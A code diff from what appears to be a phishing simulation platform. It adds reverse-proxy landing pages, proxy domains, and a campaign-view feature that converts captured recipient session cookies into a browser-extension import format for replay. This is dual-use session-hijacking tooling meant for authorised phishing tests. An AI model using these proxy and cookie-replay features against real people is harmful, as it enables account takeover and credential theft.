* @param {string} template.domainID * @param {string} template.beforeLandingPageID + * @param {string} template.beforeLandingProxyID * @param {string} template.afterLandingPageID + * @param 
{string} template.afterLandingProxyID * @param {string} template.landingPageID + * @param {string} template.landingProxyID * @param {string} template.smtpConfigurationID * @param {string} template.apiSenderID * @param {string} template.afterLandingPageRedirectURL @@ -923,8 +926,11 @@ export class API { companyID, domainID, beforeLandingPageID, + beforeLandingProxyID, afterLandingPageID, + afterLandingProxyID, landingPageID, + landingProxyID, smtpConfigurationID, apiSenderID, urlIdentifierID, @@ -937,8 +943,11 @@ export class API { companyID: companyID, domainID: domainID, beforeLandingPageID: beforeLandingPageID, + beforeLandingProxyID: beforeLandingProxyID, afterLandingPageID: afterLandingPageID, + afterLandingProxyID: afterLandingProxyID, landingPageID: landingPageID, + landingProxyID: landingProxyID, smtpConfigurationID: smtpConfigurationID, apiSenderID: apiSenderID, afterLandingPageRedirectURL: afterLandingPageRedirectURL, @@ -957,8 +966,11 @@ export class API { * @param {string} template.companyID * @param {string} template.domainID * @param {string} template.beforeLandingPageID + * @param {string} template.beforeLandingProxyID * @param {string} template.afterLandingPageID + * @param {string} template.afterLandingProxyID * @param {string} template.landingPageID + * @param {string} template.landingProxyID * @param {string} template.smtpConfigurationID * @param {string} template.apiSenderID * @param {string} template.afterLandingPageRedirectURL @@ -974,8 +986,11 @@ export class API { companyID, domainID, beforeLandingPageID, + beforeLandingProxyID, afterLandingPageID, + afterLandingProxyID, landingPageID, + landingProxyID, smtpConfigurationID, apiSenderID, afterLandingPageRedirectURL, @@ -989,8 +1004,11 @@ export class API { companyID: companyID, domainID: domainID, beforeLandingPageID: beforeLandingPageID, + beforeLandingProxyID: beforeLandingProxyID, afterLandingPageID: afterLandingPageID, + afterLandingProxyID: afterLandingProxyID, landingPageID: 
landingPageID, + landingProxyID: landingProxyID, smtpConfigurationID: smtpConfigurationID, apiSenderID: apiSenderID, afterLandingPageRedirectURL: afterLandingPageRedirectURL, @@ -1092,6 +1110,8 @@ export class API { * * @param {object} domain * @param {string} domain.name + * @param {string} domain.type + * @param {string} domain.proxyTargetDomain * @param {boolean} domain.managedTLS * @param {boolean} domain.ownManagedTLS * @param {string} domain.ownManagedTLSKey @@ -1105,6 +1125,8 @@ export class API { */ create: async ({ name, + type, + proxyTargetDomain, managedTLS, ownManagedTLS, ownManagedTLSKey, @@ -1117,6 +1139,8 @@ export class API { }) => { return await postJSON(this.getPath('/domain/'), { name: name, + type: type, + proxyTargetDomain: proxyTargetDomain, managedTLS: managedTLS, ownManagedTLS: ownManagedTLS, ownManagedTLSKey: ownManagedTLSKey, @@ -1134,19 +1158,23 @@ export class API { * * @param {object} domain * @param {string} domain.id + * @param {string} [domain.type] + * @param {string} [domain.proxyTargetDomain] * @param {boolean} domain.managedTLS * @param {boolean} domain.ownManagedTLS * @param {string} domain.ownManagedTLSKey * @param {string} domain.ownManagedTLSPem - * @param {boolean} domain.hostWebsite - * @param {string} domain.pageContent - * @param {string} domain.pageNotFoundContent - * @param {string} domain.redirectURL + * @param {boolean} [domain.hostWebsite] + * @param {string} [domain.pageContent] + * @param {string} [domain.pageNotFoundContent] + * @param {string} [domain.redirectURL] * @param {string} domain.companyID * @returns {Promise} */ update: async ({ id, + type, + proxyTargetDomain, managedTLS, ownManagedTLS, ownManagedTLSKey, @@ -1157,17 +1185,23 @@ export class API { redirectURL, companyID }) => { - return await postJSON(this.getPath(`/domain/${id}`), { - hostWebsite: hostWebsite, + const payload = { managedTLS: managedTLS, ownManagedTLS: ownManagedTLS, ownManagedTLSKey: ownManagedTLSKey, ownManagedTLSPem: 
ownManagedTLSPem, - pageContent: pageContent, - pageNotFoundContent: pageNotFoundContent, - redirectURL: redirectURL, companyID: companyID - }); + }; + + // conditionally add fields if they are provided + if (type !== undefined) payload.type = type; + if (proxyTargetDomain !== undefined) payload.proxyTargetDomain = proxyTargetDomain; + if (hostWebsite !== undefined) payload.hostWebsite = hostWebsite; + if (pageContent !== undefined) payload.pageContent = pageContent; + if (pageNotFoundContent !== undefined) payload.pageNotFoundContent = pageNotFoundContent; + if (redirectURL !== undefined) payload.redirectURL = redirectURL; + + return await postJSON(this.getPath(`/domain/${id}`), payload); }, /** @@ -1280,14 +1314,17 @@ export class API { * @param {string} name * @param {string} content * @param {string} companyID + * @param {object} additionalFields - Optional additional fields for Proxy pages * @returns {Promise} */ - create: async (name, content, companyID) => { - return await postJSON(this.getPath('/page'), { + create: async (name, content, companyID, additionalFields = {}) => { + const payload = { name: name, content: content, - companyID: companyID - }); + companyID: companyID, + ...additionalFields + }; + return await postJSON(this.getPath('/page'), payload); }, /** @@ -2715,6 +2752,93 @@ export class API { } }; + /** + * proxy is the API for Proxy related operations. + */ + proxy = { + /** + * Get a Proxy by its ID. + * + * @param {string} id + * @returns {Promise} + */ + getByID: async (id) => { + return await getJSON(this.getPath(`/proxy/${id}`)); + }, + + /** + * Get all Proxies using pagination. + * + * @param {TableURLParams} options + * @param {string|null} companyID + * @returns {Promise} + */ + getAll: async (options, companyID = null) => { + return await getJSON( + this.getPath(`/proxy?${appendQuery(options)}${this.appendCompanyQuery(companyID)}`) + ); + }, + + /** + * Get all Proxies overview using pagination. 
+ * + * @param {TableURLParams} options + * @param {string|null} companyID + * @returns {Promise} + */ + getAllSubset: async (options, companyID = null) => { + return await getJSON( + this.getPath(`/proxy/overview?${appendQuery(options)}${this.appendCompanyQuery(companyID)}`) + ); + }, + + /** + * Create a new Proxy. + * + * @param {object} proxy + * @param {string} proxy.name + * @param {string} proxy.description + * @param {string} proxy.startURL + * @param {string} proxy.proxyConfig + * @param {string} proxy.companyID + * @returns {Promise} + */ + create: async ({ name, description, startURL, proxyConfig, companyID }) => { + return await postJSON(this.getPath('/proxy'), { + name: name, + description: description, + startURL: startURL, + proxyConfig: proxyConfig, + companyID: companyID + }); + }, + + /** + * Update a Proxy. + * + * @param {string} id + * @param {object} proxy + * @param {string} proxy.name + * @param {string} proxy.description + * @param {string} proxy.startURL + * @param {string} proxy.proxyConfig + * @returns {Promise} + */ + update: async (id, proxy) => { + return await patchJSON(this.getPath(`/proxy/${id}`), proxy); + }, + + /** + * Delete a Proxy. 
+ * + * @param {string} id + * @returns {Promise} + */ + delete: async (id) => { + return await deleteJSON(this.getPath(`/proxy/${id}`)); + } + }; + /** * import is for importing assets, landing pages and etc */ diff --git a/frontend/src/lib/components/ProxySvgIcon.svelte b/frontend/src/lib/components/ProxySvgIcon.svelte new file mode 100644 index 0000000..4102a82 --- /dev/null +++ b/frontend/src/lib/components/ProxySvgIcon.svelte @@ -0,0 +1,21 @@ + + + + {title} + + diff --git a/frontend/src/lib/components/editor/Editor.svelte b/frontend/src/lib/components/editor/Editor.svelte index ebb20da..fd42092 100644 --- a/frontend/src/lib/components/editor/Editor.svelte +++ b/frontend/src/lib/components/editor/Editor.svelte @@ -103,6 +103,7 @@ onMount(() => { document.body.classList.add('overflow-hidden'); + /* ts-ignore */ self.MonacoEnvironment = { getWorker: function (_, label) { if (label === 'html') { diff --git a/frontend/src/lib/components/editor/SimpleCodeEditor.svelte b/frontend/src/lib/components/editor/SimpleCodeEditor.svelte index 515f03f..3cf879b 100644 --- a/frontend/src/lib/components/editor/SimpleCodeEditor.svelte +++ b/frontend/src/lib/components/editor/SimpleCodeEditor.svelte @@ -51,6 +51,7 @@ editor.dispose(); } }; + /* @ts-ignore */ self.MonacoEnvironment = { getWorker: function (_, label) { if (label === 'json') { @@ -145,7 +146,7 @@
{placeholder}
+ class="text-xs text-gray-600 dark:text-gray-300 whitespace-pre-wrap transition-colors duration-200 select-text cursor-text">{placeholder} {/if} diff --git a/frontend/src/lib/components/form/PageTypeSwitcher.svelte b/frontend/src/lib/components/form/PageTypeSwitcher.svelte new file mode 100644 index 0000000..1e6eed5 --- /dev/null +++ b/frontend/src/lib/components/form/PageTypeSwitcher.svelte @@ -0,0 +1,40 @@ + + +
+ {#each options as option} + + {/each} +
diff --git a/frontend/src/lib/components/form/TextFieldSelectWithType.svelte b/frontend/src/lib/components/form/TextFieldSelectWithType.svelte new file mode 100644 index 0000000..b6fb393 --- /dev/null +++ b/frontend/src/lib/components/form/TextFieldSelectWithType.svelte @@ -0,0 +1,401 @@ + + +
+ +
+
+ + + + {#if !isFocused} +
+ + +
+ {/if} + + + {#if showDropdown} + + {/if} + + {#if optional === true && hasValue} + + {/if} + + +
+ + {#if showDropdown} +
+
    + {#if allOptions.length} + {#each allOptions as option, index} +
  • + +
  • + {/each} + {:else} +
  • + No {type === 'proxy' ? 'Proxies' : 'pages'} available +
  • + {/if} +
+
+ {/if} +
+
diff --git a/frontend/src/lib/components/header/DesktopMenu.svelte b/frontend/src/lib/components/header/DesktopMenu.svelte index 2f54020..4021591 100644 --- a/frontend/src/lib/components/header/DesktopMenu.svelte +++ b/frontend/src/lib/components/header/DesktopMenu.svelte @@ -65,6 +65,11 @@ api_senders: ` +`, + + proxy: ` + + ` }; @@ -79,6 +84,7 @@ '/recipient/group/': 'recipient_groups', '/domain/': 'domains_overview', '/page/': 'pages', + '/proxy/': 'proxy', '/asset/': 'assets', '/email/': 'emails_overview', '/attachment/': 'attachments', diff --git a/frontend/src/lib/consts/navigation.js b/frontend/src/lib/consts/navigation.js index 577cfb5..fa88362 100644 --- a/frontend/src/lib/consts/navigation.js +++ b/frontend/src/lib/consts/navigation.js @@ -56,6 +56,10 @@ export const route = { label: 'Pages', route: '/page/' }, + proxy: { + label: 'Proxies', + route: '/proxy/' + }, campaignTemplates: { label: 'Campaign Templates', singleLabel: 'Templates', @@ -109,7 +113,7 @@ export const menu = [ { label: 'Domains', type: 'submenu', - items: [route.domain, route.pages, route.assets] + items: [route.domain, route.pages, route.proxy, route.assets] }, { label: 'Emails', diff --git a/frontend/src/routes/campaign-template/+page.svelte b/frontend/src/routes/campaign-template/+page.svelte index 038eb94..86764fe 100644 --- a/frontend/src/routes/campaign-template/+page.svelte +++ b/frontend/src/routes/campaign-template/+page.svelte @@ -18,6 +18,7 @@ import { BiMap } from '$lib/utils/maps'; import TextFieldSelect from '$lib/components/TextFieldSelect.svelte'; import Modal from '$lib/components/Modal.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; import TableCellEmpty from '$lib/components/table/TableCellEmpty.svelte'; import BigButton from '$lib/components/BigButton.svelte'; @@ -30,10 +31,11 @@ import TableCellCheck from '$lib/components/table/TableCellCheck.svelte'; import TableDropDownEllipsis 
from '$lib/components/table/TableDropDownEllipsis.svelte'; import DeleteAlert from '$lib/components/modal/DeleteAlert.svelte'; - import { page } from '$app/stores'; // Add this import at the top + import { page } from '$app/stores'; import SelectSquare from '$lib/components/SelectSquare.svelte'; import TableDropDownButton from '$lib/components/table/TableDropDownButton.svelte'; import CopyCell from '$lib/components/table/CopyCell.svelte'; + import TextFieldSelectWithType from '$lib/components/form/TextFieldSelectWithType.svelte'; // services const appStateService = AppStateService.instance; @@ -46,8 +48,11 @@ name: null, domain: null, landingPage: null, + landingPageType: 'page', // 'page' or 'proxy' beforeLandingPage: null, + beforeLandingPageType: 'page', // 'page' or 'proxy' afterLandingPage: null, + afterLandingPageType: 'page', // 'page' or 'proxy' afterLandingPageRedirectURL: null, email: null, smtpConfiguration: null, @@ -59,9 +64,13 @@ let contextCompanyID = null; let domainMap = new BiMap({}); + let domainObjectMap = new Map(); // stores full domain objects let beforeLandingPageMap = new BiMap({}); let landingPageMap = new BiMap({}); let afterLandingPageMap = new BiMap({}); + let beforeLandingProxyMap = new BiMap({}); + let landingProxyMap = new BiMap({}); + let afterLandingProxyMap = new BiMap({}); let emailMap = new BiMap({}); let smtpConfigurationMap = new BiMap({}); let apiSenderMap = new BiMap({}); @@ -107,6 +116,7 @@ refreshSmtpConfigurations(), refreshApiSenders(), refreshPages(), + refreshProxies(), getCampaignTemplates(), refreshIdentifiers() ]); @@ -123,10 +133,17 @@ }); const refreshDomains = async () => { - const domains = await fetchAllRows((options) => { + const allDomains = await fetchAllRows((options) => { return api.domain.getAllSubset(options, contextCompanyID); }); - domainMap = BiMap.FromArrayOfObjects(domains); + // filter to only include regular domains (not proxy domains) + const regularDomains = allDomains.filter((domain) => 
domain.type !== 'proxy'); + domainMap = BiMap.FromArrayOfObjects(regularDomains); + // store full domain objects for type access + domainObjectMap = new Map(); + regularDomains.forEach((domain) => { + domainObjectMap.set(domain.id, domain); + }); }; const refreshEmails = async () => { @@ -159,6 +176,15 @@ afterLandingPageMap = BiMap.FromArrayOfObjects(pages); }; + const refreshProxies = async () => { + const proxies = await fetchAllRows((options) => { + return api.proxy.getAllSubset(options, contextCompanyID); + }); + landingProxyMap = BiMap.FromArrayOfObjects(proxies); + beforeLandingProxyMap = BiMap.FromArrayOfObjects(proxies); + afterLandingProxyMap = BiMap.FromArrayOfObjects(proxies); + }; + const refreshIdentifiers = async () => { const identifiers = await fetchAllRows((options) => { return api.identifier.getAll(options); @@ -271,9 +297,30 @@ emailID: emailMap.byValueOrNull(formValues.email), smtpConfigurationID: smtpConfigurationMap.byValueOrNull(formValues.smtpConfiguration), apiSenderID: apiSenderMap.byValueOrNull(formValues.apiSender), - landingPageID: landingPageMap.byValue(formValues.landingPage), - beforeLandingPageID: beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage), - afterLandingPageID: afterLandingPageMap.byValueOrNull(formValues.afterLandingPage), + landingPageID: + formValues.landingPageType === 'page' + ? landingPageMap.byValueOrNull(formValues.landingPage) + : null, + landingProxyID: + formValues.landingPageType === 'proxy' + ? landingProxyMap.byValueOrNull(formValues.landingPage) + : null, + beforeLandingPageID: + formValues.beforeLandingPageType === 'page' + ? beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage) + : null, + beforeLandingProxyID: + formValues.beforeLandingPageType === 'proxy' + ? beforeLandingProxyMap.byValueOrNull(formValues.beforeLandingPage) + : null, + afterLandingPageID: + formValues.afterLandingPageType === 'page' + ? 
afterLandingPageMap.byValueOrNull(formValues.afterLandingPage) + : null, + afterLandingProxyID: + formValues.afterLandingPageType === 'proxy' + ? afterLandingProxyMap.byValueOrNull(formValues.afterLandingPage) + : null, afterLandingPageRedirectURL: formValues.afterLandingPageRedirectURL, urlIdentifierID: identifierMap.byValueOrNull(formValues.urlIdentifier), stateIdentifierID: identifierMap.byValueOrNull(formValues.stateIdentifier), @@ -302,9 +349,30 @@ emailID: emailMap.byValueOrNull(formValues.email), smtpConfigurationID: smtpConfigurationMap.byValueOrNull(formValues.smtpConfiguration), apiSenderID: apiSenderMap.byValueOrNull(formValues.apiSender), - landingPageID: landingPageMap.byValueOrNull(formValues.landingPage), - beforeLandingPageID: beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage), - afterLandingPageID: afterLandingPageMap.byValueOrNull(formValues.afterLandingPage), + landingPageID: + formValues.landingPageType === 'page' + ? landingPageMap.byValueOrNull(formValues.landingPage) + : null, + landingProxyID: + formValues.landingPageType === 'proxy' + ? landingProxyMap.byValueOrNull(formValues.landingPage) + : null, + beforeLandingPageID: + formValues.beforeLandingPageType === 'page' + ? beforeLandingPageMap.byValueOrNull(formValues.beforeLandingPage) + : null, + beforeLandingProxyID: + formValues.beforeLandingPageType === 'proxy' + ? beforeLandingProxyMap.byValueOrNull(formValues.beforeLandingPage) + : null, + afterLandingPageID: + formValues.afterLandingPageType === 'page' + ? afterLandingPageMap.byValueOrNull(formValues.afterLandingPage) + : null, + afterLandingProxyID: + formValues.afterLandingPageType === 'proxy' + ? 
afterLandingProxyMap.byValueOrNull(formValues.afterLandingPage) + : null, afterLandingPageRedirectURL: formValues.afterLandingPageRedirectURL, urlIdentifierID: identifierMap.byValueOrNull(formValues.urlIdentifier), stateIdentifierID: identifierMap.byValueOrNull(formValues.stateIdentifier), @@ -359,8 +427,11 @@ name: null, domain: null, landingPage: null, + landingPageType: 'page', beforeLandingPage: null, + beforeLandingPageType: 'page', afterLandingPage: null, + afterLandingPageType: 'page', afterLandingPageRedirectURL: null, email: null, smtpConfiguration: null, @@ -422,9 +493,34 @@ } formValues.domain = domainMap.byKey(template.domainID); formValues.email = emailMap.byKey(template.emailID); - formValues.landingPage = landingPageMap.byKey(template.landingPageID); - formValues.beforeLandingPage = beforeLandingPageMap.byKey(template.beforeLandingPageID); - formValues.afterLandingPage = afterLandingPageMap.byKey(template.afterLandingPageID); + + // handle landing page (page or proxy) + if (template.landingPageID) { + formValues.landingPage = landingPageMap.byKey(template.landingPageID); + formValues.landingPageType = 'page'; + } else if (template.landingProxyID) { + formValues.landingPage = landingProxyMap.byKey(template.landingProxyID); + formValues.landingPageType = 'proxy'; + } + + // handle before landing page (page or proxy) + if (template.beforeLandingPageID) { + formValues.beforeLandingPage = beforeLandingPageMap.byKey(template.beforeLandingPageID); + formValues.beforeLandingPageType = 'page'; + } else if (template.beforeLandingProxyID) { + formValues.beforeLandingPage = beforeLandingProxyMap.byKey(template.beforeLandingProxyID); + formValues.beforeLandingPageType = 'proxy'; + } + + // handle after landing page (page or proxy) + if (template.afterLandingPageID) { + formValues.afterLandingPage = afterLandingPageMap.byKey(template.afterLandingPageID); + formValues.afterLandingPageType = 'page'; + } else if (template.afterLandingProxyID) { + 
formValues.afterLandingPage = afterLandingProxyMap.byKey(template.afterLandingProxyID); + formValues.afterLandingPageType = 'proxy'; + } + formValues.afterLandingPageRedirectURL = template.afterLandingPageRedirectURL; formValues.urlIdentifier = identifierMap.byKey(template.urlIdentifierID); formValues.stateIdentifier = identifierMap.byKey(template.stateIdentifierID); @@ -515,6 +611,13 @@ {beforeLandingPageMap.byKey(template.beforeLandingPageID)} + {:else if template.beforeLandingProxyID} + + + + {beforeLandingProxyMap.byKey(template.beforeLandingProxyID)} + + {/if} @@ -522,6 +625,13 @@ {landingPageMap.byKey(template.landingPageID)} + {:else if template.landingProxyID} + + + + {landingProxyMap.byKey(template.landingProxyID)} + + {/if} @@ -529,6 +639,13 @@ {afterLandingPageMap.byKey(template.afterLandingPageID)} + {:else if template.afterLandingProxyID} + + + + {afterLandingProxyMap.byKey(template.afterLandingProxyID)} + + {/if} @@ -781,31 +898,37 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n

Page Flow

-
-
- Before Landing Page -
-
- Landing Page -
-
- After Landing Page -
+
+ + Before Landing + + + Landing + + + After Landing +
-

Before Landing Page

+

+ Before Landing {formValues.beforeLandingPageType === 'proxy' + ? 'Proxy' + : 'Page'} +

{formValues.beforeLandingPage || 'Not selected'}

@@ -853,7 +980,9 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n 2
-

Landing Page

+

+ Landing {formValues.landingPageType === 'proxy' ? 'Proxy' : 'Page'} +

{formValues.landingPage || 'Required'}

@@ -877,7 +1006,9 @@ Simulation URLs to allow:\n${allowListingData.simulationUrl}\n >
-

After Landing Page

+

+ After Landing {formValues.afterLandingPageType === 'proxy' ? 'Proxy' : 'Page'} +

{formValues.afterLandingPage || 'Not selected'}

diff --git a/frontend/src/routes/campaign/[id]/+page.svelte b/frontend/src/routes/campaign/[id]/+page.svelte index e89246a..78e676e 100644 --- a/frontend/src/routes/campaign/[id]/+page.svelte +++ b/frontend/src/routes/campaign/[id]/+page.svelte @@ -8,6 +8,7 @@ import { BiMap } from '$lib/utils/maps'; import { defaultOptions, fetchAllRows } from '$lib/utils/api-utils'; import { AppStateService } from '$lib/service/appState'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import TableRow from '$lib/components/table/TableRow.svelte'; import TableCell from '$lib/components/table/TableCell.svelte'; import TableCellLink from '$lib/components/table/TableCellLink.svelte'; @@ -36,6 +37,11 @@ import Alert from '$lib/components/Alert.svelte'; import EventTimeline from '$lib/components/EventTimeline.svelte'; import CellCopy from '$lib/components/table/CopyCell.svelte'; + import Button from '$lib/components/Button.svelte'; + import FormGrid from '$lib/components/FormGrid.svelte'; + import FormFooter from '$lib/components/FormFooter.svelte'; + import FormColumns from '$lib/components/FormColumns.svelte'; + import FormColumn from '$lib/components/FormColumn.svelte'; import EventName from '$lib/components/table/EventName.svelte'; import { goto } from '$app/navigation'; import { globalButtonDisabledAttributes } from '$lib/utils/form'; @@ -124,6 +130,8 @@ let isCloseModalVisible = false; let isAnonymizeModalVisible = false; let isSendMessageModalVisible = false; + let isStorageAceModalVisible = false; + let storedCookieData = ''; let sendMessageRecipient = null; let lastPoll3399Nano = ''; @@ -560,6 +568,48 @@ isAnonymizeModalVisible = false; }; + const closeStorageAceModal = () => { + isStorageAceModalVisible = false; + storedCookieData = ''; + }; + + const onStorageAceModalOk = () => { + closeStorageAceModal(); + }; + + /** @param {string} eventData @param {string} eventName */ + const onClickCopyEventData = async (eventData, eventName) => { + try { + // remove 
the cookie emoji prefix before copying + const dataWithoutEmoji = eventData.startsWith('🍪 ') ? eventData.substring(3) : eventData; + await navigator.clipboard.writeText(dataWithoutEmoji); + + if (eventName === 'campaign_recipient_submitted_data' && eventData.startsWith('🍪')) { + storedCookieData = eventData; + isStorageAceModalVisible = true; + } + + addToast('Copied to clipboard', 'Success'); + } catch (e) { + addToast('Failed to copy data to clipboard', 'Error'); + console.error('failed to copy data to clipboard', e); + } + }; + + const onClickCopyCookies = async () => { + try { + // remove the cookie emoji prefix before copying + const dataWithoutEmoji = storedCookieData.startsWith('🍪 ') + ? storedCookieData.substring(3) + : storedCookieData; + await navigator.clipboard.writeText(dataWithoutEmoji); + addToast('Copied to clipboard', 'Success'); + } catch (e) { + addToast('Failed to copy cookie data', 'Error'); + console.error('failed to copy cookie data', e); + } + }; + const onConfirmCloseCampaign = async (a) => { let res; try { @@ -790,6 +840,89 @@ event.target.value = ''; } }; + + // helper function to format cookie capture data + const formatEventData = (eventData, eventName) => { + if (!eventData || eventName !== 'campaign_recipient_submitted_data') { + return eventData; + } + + try { + // parse the event data as JSON + const parsedData = JSON.parse(eventData); + + // check if it's the new cookie bundle format + if (parsedData.capture_type === 'cookie' && parsedData.cookies) { + const cookies = []; + + // iterate through each captured cookie + for (const [captureName, cookieData] of Object.entries(parsedData.cookies)) { + // convert SameSite attribute to browser extension format + let sameSite = 'no_restriction'; + if (cookieData.sameSite) { + switch (cookieData.sameSite.toLowerCase()) { + case 'strict': + sameSite = 'strict'; + break; + case 'lax': + sameSite = 'lax'; + break; + case 'none': + sameSite = 'no_restriction'; + break; + default: + sameSite = 
'no_restriction'; + } + } + + // determine if this is a host-only cookie + const domain = cookieData.domain || ''; + const hostOnly = domain && !domain.startsWith('.'); + + // convert to browser extension compatible format + const browserCookie = { + domain: domain, + hostOnly: hostOnly, + httpOnly: cookieData.httpOnly === 'true', + name: cookieData.name || '', + path: cookieData.path || '/', + sameSite: sameSite, + secure: cookieData.secure === 'true', + session: !cookieData.expires && !cookieData.maxAge, // session cookie if no expiration + storeId: '1', + value: cookieData.value || '' + }; + + // handle expiration date + if (cookieData.expires) { + const expireDate = new Date(cookieData.expires); + if (!isNaN(expireDate.getTime())) { + browserCookie.expirationDate = expireDate.getTime() / 1000; + browserCookie.session = false; + } + } else if (cookieData.maxAge) { + // handle maxAge if present + const maxAgeSeconds = parseInt(cookieData.maxAge); + if (!isNaN(maxAgeSeconds)) { + browserCookie.expirationDate = Date.now() / 1000 + maxAgeSeconds; + browserCookie.session = false; + } + } + + cookies.push(browserCookie); + } + + // return as array format for browser import with cookie emoji + return '🍪 ' + JSON.stringify(cookies, null, 2); + } + + // for other submitted data, return as is + return eventData; + } catch (e) { + // if not valid JSON, return as is + return eventData; + } + }; @@ -1386,7 +1519,23 @@ - + {#if campaign.eventTypesIDToNameMap[event.eventID] === 'campaign_recipient_submitted_data' && formatEventData(event.data, campaign.eventTypesIDToNameMap[event.eventID]).startsWith('🍪')} + + {:else} + + {/if} @@ -1539,12 +1688,23 @@ - + {#if campaign.eventTypesIDToNameMap[event.eventID] === 'campaign_recipient_submitted_data' && formatEventData(event.data, campaign.eventTypesIDToNameMap[event.eventID]).startsWith('🍪')} + + {:else} + + {/if}
- {#if template.landingPage} + {#if template.landingPage || template.landingProxy} +
+ {/if} + {:else if template.beforeLandingProxy} +
+
+ Before +
+
+ + {#if template.landingPage || template.landingProxy}
{/if} {/if} @@ -1615,7 +1787,19 @@
Main Landing
- {#if template.afterLandingPage || template.afterLandingPageRedirectURL} + {#if template.afterLandingPage || template.afterLandingProxy || template.afterLandingPageRedirectURL} +
+ {/if} + {:else if template.landingProxy} +
+
+ Main +
+
+ + {#if template.afterLandingPage || template.afterLandingProxy || template.afterLandingPageRedirectURL}
{/if} {/if} @@ -1625,6 +1809,14 @@
After Landing
+ {:else if template.afterLandingProxy} +
+
+ After +
+
{/if} {#if template.afterLandingPageRedirectURL}
@@ -1667,17 +1859,40 @@ Before Page: - {template.beforeLandingPage?.name ?? ''} + + {#if template.beforeLandingPage} + {template.beforeLandingPage.name} + {:else if template.beforeLandingProxy} + + + {template.beforeLandingProxy.name} + + {/if} + Main Page: - {template.landingPage?.name ?? ''} + + {#if template.landingPage} + {template.landingPage.name} + {:else if template.landingProxy} + + + {template.landingProxy.name} + + {/if} + After Page: - {template.afterLandingPage?.name ?? ''} + + {#if template.afterLandingPage} + {template.afterLandingPage.name} + {:else if template.afterLandingProxy} + + + {template.afterLandingProxy.name} + + {/if} + Redirect URL: + + +
+ +
+

Import cookie

+

+ Cookies can be imported using the StorageAce extension. +

+
+ + +
+ +
+
+ + + + + + +
+ +
+
+
diff --git a/frontend/src/routes/domain/+page.svelte b/frontend/src/routes/domain/+page.svelte index 7303107..6235eef 100644 --- a/frontend/src/routes/domain/+page.svelte +++ b/frontend/src/routes/domain/+page.svelte @@ -18,6 +18,7 @@ import { AppStateService } from '$lib/service/appState'; import TableCellAction from '$lib/components/table/TableCellAction.svelte'; import TableCellEmpty from '$lib/components/table/TableCellEmpty.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; import Modal from '$lib/components/Modal.svelte'; import TableCellCheck from '$lib/components/table/TableCellCheck.svelte'; @@ -54,8 +55,9 @@ ownManagedTLSPem: null, hostWebsite: true, pageContent: '', // default value - pageNotFoundContent: '404 page not found', // default value - redirectURL: '' + pageNotFoundContent: '', // default value + redirectURL: '', + staticContent: '' }; let isDeleteAlertVisible = false; @@ -67,6 +69,10 @@ let defaultValues = { ...formValues }; + + let currentDomain = null; // store current domain for proxy info + $: isProxyDomain = currentDomain?.type === 'proxy'; + $: isRegularDomain = !isProxyDomain; let contextCompanyID = null; let domains = []; let modalError = ''; @@ -78,6 +84,7 @@ let isUpdateNotFoundModalVisible = false; let isCopyContentModalVisible = false; let isDomainTableLoading = false; + // @type {null|'create'|'update'} let modalMode = null; let modalText = ''; @@ -169,23 +176,44 @@ try { isSubmitting = true; updateContentError = ''; - // clear site contents if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } - const res = await api.domain.update({ - id: formValues.id, - managedTLS: formValues.managedTLS, - ownManagedTLS: formValues.ownManagedTLS, - ownManagedTLSKey: 
formValues.ownManagedTLSKey, - ownManagedTLSPem: formValues.ownManagedTLSPem, - hostWebsite: formValues.hostWebsite, - pageContent: formValues.pageContent, - pageNotFoundContent: formValues.pageNotFoundContent, - redirectURL: formValues.redirectURL, - companyID: contextCompanyID - }); + // prepare complete update data + let updateData; + + if (isProxyDomain) { + // for proxy domains, only send TLS-related fields + updateData = { + id: formValues.id, + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + companyID: contextCompanyID + }; + } else { + // for regular domains, send all fields + updateData = { + id: formValues.id, + type: 'regular', + proxyTargetDomain: '', + managedTLS: formValues.managedTLS, + ownManagedTLS: formValues.ownManagedTLS, + ownManagedTLSKey: formValues.ownManagedTLSKey, + ownManagedTLSPem: formValues.ownManagedTLSPem, + hostWebsite: formValues.hostWebsite, + pageContent: formValues.pageContent, + pageNotFoundContent: formValues.pageNotFoundContent, + redirectURL: formValues.redirectURL, + companyID: contextCompanyID + }; + } + + // @ts-ignore + const res = await api.domain.update(updateData); if (!res.success) { updateContentError = res.error; return; @@ -245,13 +273,15 @@ const onClickCreate = async () => { modalError = ''; try { - // clear site contents if not hosting a website - if (!formValues.hostWebsite) { + // clear site contents if not hosting a website or if proxy domain + if (!formValues.hostWebsite || isProxyDomain) { formValues.pageContent = ''; formValues.pageNotFoundContent = ''; } const res = await api.domain.create({ name: formValues.name, + type: 'regular', + proxyTargetDomain: '', managedTLS: formValues.managedTLS, ownManagedTLS: formValues.ownManagedTLS, ownManagedTLSKey: formValues.ownManagedTLSKey, @@ -277,24 +307,45 @@ const onClickUpdate = async () => { modalError = ''; - // clear site contents 
